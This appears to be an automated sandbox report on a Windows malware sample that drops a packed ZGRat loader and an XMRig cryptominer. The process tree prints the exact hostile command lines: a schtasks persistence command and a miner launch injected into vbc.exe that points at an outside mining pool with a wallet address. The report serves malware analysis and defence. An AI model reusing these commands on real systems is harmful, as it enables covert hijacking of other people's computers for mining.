Overview
overview
10Static
static
102LRS3ODTLG...JL.exe
windows10-1703-x64
102LRS3ODTLG...JL.exe
windows11-21h2-x64
106G2SZLVHVH...3B.exe
windows10-1703-x64
106G2SZLVHVH...3B.exe
windows11-21h2-x64
106TS3GUANXW9E1KF8.exe
windows10-1703-x64
106TS3GUANXW9E1KF8.exe
windows11-21h2-x64
10G9NB5XSAH0XAAPCN.exe
windows10-1703-x64
6G9NB5XSAH0XAAPCN.exe
windows11-21h2-x64
6PV0HLG9QQ3...NU.exe
windows10-1703-x64
10PV0HLG9QQ3...NU.exe
windows11-21h2-x64
10Protect544cd51a.dll
windows10-1703-x64
1Protect544cd51a.dll
windows11-21h2-x64
1PsExec.exe
windows10-1703-x64
1PsExec.exe
windows11-21h2-x64
1W7W5WFGX1D...7O.exe
windows10-1703-x64
3W7W5WFGX1D...7O.exe
windows11-21h2-x64
6skz3rpen.kc1.exe
windows10-1703-x64
1skz3rpen.kc1.exe
windows11-21h2-x64
1Analysis
-
max time kernel
1102s -
max time network
1197s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-01-2024 19:03
Behavioral task
behavioral1
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win11-20231222-en
Behavioral task
behavioral3
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win11-20231215-en
Behavioral task
behavioral5
Sample
6TS3GUANXW9E1KF8.exe
Resource
win10-20231220-en
Behavioral task
behavioral6
Sample
6TS3GUANXW9E1KF8.exe
Resource
win11-20231215-en
Behavioral task
behavioral7
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win11-20231222-en
Behavioral task
behavioral9
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win10-20231220-en
Behavioral task
behavioral10
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win11-20231215-en
Behavioral task
behavioral11
Sample
Protect544cd51a.dll
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
Protect544cd51a.dll
Resource
win11-20231215-en
Behavioral task
behavioral13
Sample
PsExec.exe
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
PsExec.exe
Resource
win11-20231215-en
Behavioral task
behavioral15
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win10-20231215-en
Behavioral task
behavioral16
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win11-20231222-en
Behavioral task
behavioral17
Sample
skz3rpen.kc1.exe
Resource
win10-20231215-en
Behavioral task
behavioral18
Sample
skz3rpen.kc1.exe
Resource
win11-20231215-en
General
-
Target
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
-
Size
5.6MB
-
MD5
1a27bd843a09f923661a15300e02d703
-
SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
-
SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
-
SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
-
SSDEEP
49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T
Malware Config
Signatures
-
Detect ZGRat V1 7 IoCs
Processes:
resource yara_rule behavioral10/memory/896-0-0x0000000000360000-0x0000000000900000-memory.dmp family_zgrat_v1 behavioral10/files/0x000300000002a7d6-13.dat family_zgrat_v1 behavioral10/files/0x000300000002a7d6-12.dat family_zgrat_v1 behavioral10/files/0x000300000002a7d6-42.dat family_zgrat_v1 behavioral10/files/0x000300000002a7d6-70.dat family_zgrat_v1 behavioral10/files/0x000300000002a7d6-110.dat family_zgrat_v1 behavioral10/files/0x000300000002a7d6-131.dat family_zgrat_v1 -
XMRig Miner payload 44 IoCs
Processes:
resource yara_rule behavioral10/memory/3168-22-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-25-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-30-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-31-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-33-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-34-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/3168-39-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-54-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-56-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-58-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-57-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-55-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-59-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-60-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-61-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-62-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-63-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/224-64-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/244-85-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/244-87-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/244-88-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/244-89-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/244-86-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/244-94-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/244-95-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2092-103-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2092-104-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2092-105-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2092-106-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2092-107-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2092-108-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2092-109-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/1124-123-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/1124-124-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/1124-125-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/1124-126-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral10/memory/2208-149-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 7 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral10/memory/896-0-0x0000000000360000-0x0000000000900000-memory.dmp net_reactor behavioral10/files/0x000300000002a7d6-13.dat net_reactor behavioral10/files/0x000300000002a7d6-12.dat net_reactor behavioral10/files/0x000300000002a7d6-42.dat net_reactor behavioral10/files/0x000300000002a7d6-70.dat net_reactor behavioral10/files/0x000300000002a7d6-110.dat net_reactor behavioral10/files/0x000300000002a7d6-131.dat net_reactor -
Executes dropped EXE 6 IoCs
Processes:
.exe.exe.exe.exe.exe.exepid Process 3924 .exe 4556 .exe 2304 .exe 3748 .exe 488 .exe 4048 .exe -
Processes:
resource yara_rule behavioral10/memory/3168-17-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-18-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-20-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-22-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-33-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-34-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/3168-39-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-50-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-54-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-56-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-58-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-57-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-55-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-59-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-60-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-61-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-62-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-63-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/224-64-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-79-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-85-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-87-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-88-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-89-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-86-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-94-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/244-95-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-99-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-103-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-104-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-105-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-106-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-107-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-108-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2092-109-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/1124-119-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/1124-123-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/1124-124-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/1124-125-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/1124-126-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2208-140-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral10/memory/2208-149-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 5 IoCs
Processes:
.exe.exe.exe.exe.exedescription pid Process procid_target PID 3924 set thread context of 3168 3924 .exe 84 PID 4556 set thread context of 224 4556 .exe 91 PID 2304 set thread context of 244 2304 .exe 97 PID 3748 set thread context of 2092 3748 .exe 103 PID 488 set thread context of 1124 488 .exe 109 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 2616 schtasks.exe 3356 schtasks.exe 4636 schtasks.exe 5048 schtasks.exe 3264 schtasks.exe 3456 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 1976 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
.exe.exe.exe.exe.exe.exepid Process 3924 .exe 4556 .exe 2304 .exe 3748 .exe 488 .exe 4048 .exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exedescription pid Process Token: SeDebugPrivilege 896 PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe Token: SeDebugPrivilege 3924 .exe Token: SeLockMemoryPrivilege 3168 vbc.exe Token: SeLockMemoryPrivilege 3168 vbc.exe Token: SeDebugPrivilege 4556 .exe Token: SeLockMemoryPrivilege 224 vbc.exe Token: SeLockMemoryPrivilege 224 vbc.exe Token: SeDebugPrivilege 2304 .exe Token: SeLockMemoryPrivilege 244 vbc.exe Token: SeLockMemoryPrivilege 244 vbc.exe Token: SeDebugPrivilege 3748 .exe Token: SeLockMemoryPrivilege 2092 vbc.exe Token: SeLockMemoryPrivilege 2092 vbc.exe Token: SeDebugPrivilege 488 .exe Token: SeLockMemoryPrivilege 1124 vbc.exe Token: SeLockMemoryPrivilege 1124 vbc.exe Token: SeDebugPrivilege 4048 .exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
vbc.exevbc.exevbc.exevbc.exevbc.exepid Process 3168 vbc.exe 224 vbc.exe 244 vbc.exe 2092 vbc.exe 1124 vbc.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
PV0HLG9QQ3YXXG1AJAMYRYE08NU.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.exedescription pid Process procid_target PID 896 wrote to memory of 4044 896 PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe 76 PID 896 wrote to memory of 4044 896 PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe 76 PID 4044 wrote to memory of 1976 4044 cmd.exe 78 PID 4044 wrote to memory of 1976 4044 cmd.exe 78 PID 4044 wrote to memory of 3924 4044 cmd.exe 79 PID 4044 wrote to memory of 3924 4044 cmd.exe 79 PID 3924 wrote to memory of 3172 3924 .exe 81 PID 3924 wrote to memory of 3172 3924 .exe 81 PID 3172 wrote to memory of 2616 3172 cmd.exe 82 PID 3172 wrote to memory of 2616 3172 cmd.exe 82 PID 3924 wrote to memory of 3168 3924 .exe 84 PID 3924 wrote to memory of 3168 3924 .exe 84 PID 3924 wrote to memory of 3168 3924 .exe 84 PID 3924 wrote to memory of 3168 3924 .exe 84 PID 3924 wrote to memory of 3168 3924 .exe 84 PID 3924 wrote to memory of 3168 3924 .exe 84 PID 3924 wrote to memory of 3168 3924 .exe 84 PID 4556 wrote to memory of 3872 4556 .exe 87 PID 4556 wrote to memory of 3872 4556 .exe 87 PID 3872 wrote to memory of 3356 3872 cmd.exe 90 PID 3872 wrote to memory of 3356 3872 cmd.exe 90 PID 4556 wrote to memory of 224 4556 .exe 91 PID 4556 wrote to memory of 224 4556 .exe 91 PID 4556 wrote to memory of 224 4556 .exe 91 PID 4556 wrote to memory of 224 4556 .exe 91 PID 4556 wrote to memory of 224 4556 .exe 91 PID 4556 wrote to memory of 224 4556 .exe 91 PID 4556 wrote to memory of 224 4556 .exe 91 PID 2304 wrote to memory of 236 2304 .exe 93 PID 2304 wrote to memory of 236 2304 .exe 93 PID 236 wrote to memory of 4636 236 cmd.exe 96 PID 236 wrote to memory of 4636 236 cmd.exe 96 PID 2304 wrote to memory of 244 2304 .exe 97 PID 2304 wrote to memory of 244 2304 .exe 97 PID 2304 wrote to memory of 244 2304 .exe 97 PID 2304 wrote to memory of 244 2304 .exe 97 PID 2304 wrote to memory of 244 2304 .exe 97 PID 2304 wrote to memory of 244 2304 .exe 97 PID 2304 wrote to memory of 244 2304 .exe 97 PID 3748 wrote to memory of 2936 3748 .exe 99 PID 3748 wrote to memory of 2936 3748 .exe 99 PID 2936 wrote to memory of 5048 2936 cmd.exe 102 PID 2936 wrote to memory of 5048 2936 cmd.exe 102 PID 3748 wrote to memory of 2092 3748 .exe 103 PID 3748 wrote to memory of 2092 3748 .exe 103 PID 3748 wrote to memory of 2092 3748 .exe 103 PID 3748 wrote to memory of 2092 3748 .exe 103 PID 3748 wrote to memory of 2092 3748 .exe 103 PID 3748 wrote to memory of 2092 3748 .exe 103 PID 3748 wrote to memory of 2092 3748 .exe 103 PID 488 wrote to memory of 1068 488 .exe 105 PID 488 wrote to memory of 1068 488 .exe 105 PID 1068 wrote to memory of 3264 1068 cmd.exe 108 PID 1068 wrote to memory of 3264 1068 cmd.exe 108 PID 488 wrote to memory of 1124 488 .exe 109 PID 488 wrote to memory of 1124 488 .exe 109 PID 488 wrote to memory of 1124 488 .exe 109 PID 488 wrote to memory of 1124 488 .exe 109 PID 488 wrote to memory of 1124 488 .exe 109 PID 488 wrote to memory of 1124 488 .exe 109 PID 488 wrote to memory of 1124 488 .exe 109 PID 4048 wrote to memory of 2268 4048 .exe 111 PID 4048 wrote to memory of 2268 4048 .exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe"C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7CB2.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1976
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:2616
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3168
-
-
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:3356
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:224
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:4636
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:244
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:5048
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2092
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:3264
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1124
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵PID:2268
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:3456
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵PID:2208
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.5MB
MD5eb0ce8e0b2548e9966bfe91d13204e6a
SHA12398c2f7c5d3a386e73935f309dbee12defa4b6d
SHA256de61d4031c710cbab686dc9f4ce307a57e9e790a693f46867384a497f9112f92
SHA512ccd8c8378d12b725ac13e53a472600f96feb7daba77284cc84157cb3190ff061b916158a42bfd4686bf4b8a548d343a80724adfd782b2db54cb4514f551baa14
-
Filesize
2.4MB
MD52ec0c076ab076067f2f4b5e3596ce915
SHA1016ae83f53ba39ae50844bd07ab6d1db06afd5e3
SHA256fefcd4704238318982e29aca0d3fbcd911c1a0223d3d8e18f7eb00529f7d98c7
SHA5125187b8efe39ca452ec46555abe17653afd01d4710c7a50935e63d25dbeffe1c06a3a2fa2797a5b598b960bd2d6e01dcfb73c8c5f78d6de13dbab1661e9bf017c
-
Filesize
2.2MB
MD511ffd36f02d156a613ad7d34b0d74368
SHA10d6aad7e5d5d46769fb0defcf94e672c0d018903
SHA25623e351042b3b5c789617b4e0c6cf7d36caf3655cce2d8f86193db592f7d2893e
SHA512bff0aaaa5e7e07eddfaae0e7102dc9a8341dce60e3bc6d583dd85e3201ec1f2fc41297396f6103952001eb179877bb24b6e506015ceefbb43392f81778499edd
-
Filesize
10KB
MD5d7e25d19428407d922b5fe01468f5959
SHA1f8944548112f55629214e71536d594c24aa38ce7
SHA2569fa908716fed018a0f2ca3bcf2de9ef06c23e0437d1650bc2502f948e21bf5c8
SHA5128692a66473518bdd1c9dab899ced7c51628d674879b80dd31e47f46dfb997be6c2d9801ba4eb8a8a3eea37d2b56e1aec7d7761208c54264c82918e3826184a9f
-
Filesize
66KB
